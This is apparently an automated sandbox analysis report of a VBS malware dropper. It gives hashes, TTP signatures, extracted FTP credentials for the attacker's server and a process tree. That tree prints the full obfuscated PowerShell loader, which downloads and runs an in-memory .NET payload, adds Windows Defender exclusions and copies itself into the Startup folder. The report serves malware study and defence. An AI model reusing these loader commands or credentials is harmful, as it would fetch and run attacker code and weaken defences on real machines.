Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 01:05

General

  • Target

    1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs

  • Size

    681KB

  • MD5

    1794218436b165f2161c183c0af24a53

  • SHA1

    53d26bff0dac5b9424d6e21ab7aa80c5b20753cc

  • SHA256

    1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726

  • SHA512

    059e2d5fecd7bf2cfdef7d47c4bfb424344cd28d282e1f979f2b2e0d3afa7dda98f0c441fe93a8be93de0a4ae70d28aedeeae51012b21532b11cbe45cfcbf143

  • SSDEEP

    1536:4vvvvvvvvvvvvvvvvvvvvvvvL88888888888888888888888888888888888888F:4MZe1

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Blocklisted process makes network request 29 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$mpAQs = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉGUШḆЉdQByШḆЉHQШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉGgШḆЉdШḆЉB0ШḆЉHШḆЉШḆЉcwШḆЉ6ШḆЉC8ШḆЉLwBwШḆЉGEШḆЉcwB0ШḆЉGUШḆЉYgBpШḆЉG4ШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉHIШḆЉYQB3ШḆЉC8ШḆЉZQBUШḆЉHMШḆЉMwBUШḆЉDkШḆЉWШḆЉBmШḆЉCcШḆЉIШḆЉШḆЉoШḆЉCШḆЉШḆЉXQBdШḆЉFsШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉG8ШḆЉWwШḆЉgШḆЉCwШḆЉIШḆЉBsШḆЉGwШḆЉdQBuШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGUШḆЉawBvШḆЉHYШḆЉbgBJШḆЉC4ШḆЉKQШḆЉgШḆЉCcШḆЉSQBWШḆЉEYШḆЉcgBwШḆЉCcШḆЉIШḆЉШḆЉoШḆЉGQШḆЉbwBoШḆЉHQШḆЉZQBNШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉnШḆЉDEШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉC4ШḆЉMwB5ШḆЉHIШḆЉYQByШḆЉGIШḆЉaQBMШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉnШḆЉCgШḆЉZQBwШḆЉHkШḆЉVШḆЉB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉIШḆЉB4ШḆЉG0ШḆЉegBYШḆЉHgШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZШḆЉBhШḆЉG8ШḆЉTШḆЉШḆЉuШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHQШḆЉbgBlШḆЉHIШḆЉcgB1ШḆЉEMШḆЉOgШḆЉ6ШḆЉF0ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEEШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉJMhOgCTIScШḆЉIШḆЉШḆЉoШḆЉGUШḆЉYwBhШḆЉGwШḆЉcШḆЉBlШḆЉFIШḆЉLgBRШḆЉGoШḆЉbgB3ШḆЉGwШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉNШḆЉШḆЉ2ШḆЉGUШḆЉcwBhШḆЉEIШḆЉbQBvШḆЉHIШḆЉRgШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉHIШḆЉZQB2ШḆЉG4ШḆЉbwBDШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉB4ШḆЉG0ШḆЉegBYШḆЉHgШḆЉJШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉGUШḆЉdШḆЉB5ШḆЉEIШḆЉWwШḆЉ7ШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉFEШḆЉagBuШḆЉHcШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉGoШḆЉbgB3ШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉpШḆЉCgШḆЉZQBzШḆЉG8ШḆЉcШḆЉBzШḆЉGkШḆЉZШḆЉШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉCcШḆЉdШḆЉB4ШḆЉHQШḆЉLgШḆЉxШḆЉDШḆЉШḆЉTШḆЉBMШḆЉEQШḆЉLwШḆЉxШḆЉDШḆЉШḆЉLwByШḆЉGUШḆЉdШḆЉBwШḆЉHkШḆЉcgBjШḆЉHШḆЉШḆЉVQШḆЉvШḆЉHIШḆЉYgШḆЉuШḆЉG0ШḆЉbwBjШḆЉC4ШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉuШḆЉHШḆЉШḆЉdШḆЉBmШḆЉEШḆЉШḆЉMQB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC8ШḆЉLwШḆЉ6ШḆЉHШḆЉШḆЉdШḆЉBmШḆЉCcШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFEШḆЉagBuШḆЉHcШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉEШḆЉШḆЉQШḆЉBwШḆЉEoШḆЉOШḆЉШḆЉ3ШḆЉDUШḆЉMQШḆЉyШḆЉG8ШḆЉcgBwШḆЉHIШḆЉZQBwШḆЉG8ШḆЉbШḆЉBlШḆЉHYШḆЉZQBkШḆЉCcШḆЉLШḆЉШḆЉnШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCgШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwBrШḆЉHIШḆЉbwB3ШḆЉHQШḆЉZQBOШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉC0ШḆЉdwBlШḆЉG4ШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉcwBsШḆЉGEШḆЉaQB0ШḆЉG4ШḆЉZQBkШḆЉGUШḆЉcgBDШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉUQBqШḆЉG4ШḆЉdwBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉGMШḆЉWQBCШḆЉHkШḆЉTgШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBjШḆЉFkШḆЉQgB5ШḆЉE4ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBjШḆЉFkШḆЉQgB5ШḆЉE4ШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCAAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBvAEcAZgBEAFEAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABvAEcAZgBEAFEAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACШḆЉAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAawBjAEoASABlACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAGsAYwBKAEgAZQAkACAAOwA=';$tYYYr = $mpAQs.replace('ШḆЉ' , 'A') ;$bZIaf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tYYYr ) ); $bZIaf = $bZIaf[-1..-$bZIaf.Length] -join '';$bZIaf = $bZIaf.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs');powershell $bZIaf
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $eHJck = $host.Version.Major.Equals(2) ;if ($eHJck) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$NyBYc = (New-Object Net.WebClient);$NyBYc.Encoding = [System.Text.Encoding]::UTF8;$NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lwnjQ;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lwnjQ = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lwnjQ = $lqVmC.DownloadString( $lwnjQ );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lwnjQ.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'fX9T3sTe/war/moc.nibetsap//:sptth' , $hzwje , 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:228
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
          4⤵
            PID:1448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4892
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
            4⤵
              PID:3880
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
              4⤵
                PID:408
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                4⤵
                  PID:4312
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                  4⤵
                    PID:1956
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                    4⤵
                      PID:3508
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                      4⤵
                        PID:1740
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                        4⤵
                          PID:2708
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                          4⤵
                            PID:4824
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
                            4⤵
                              PID:2848
                            • C:\Windows\SYSTEM32\cmd.exe
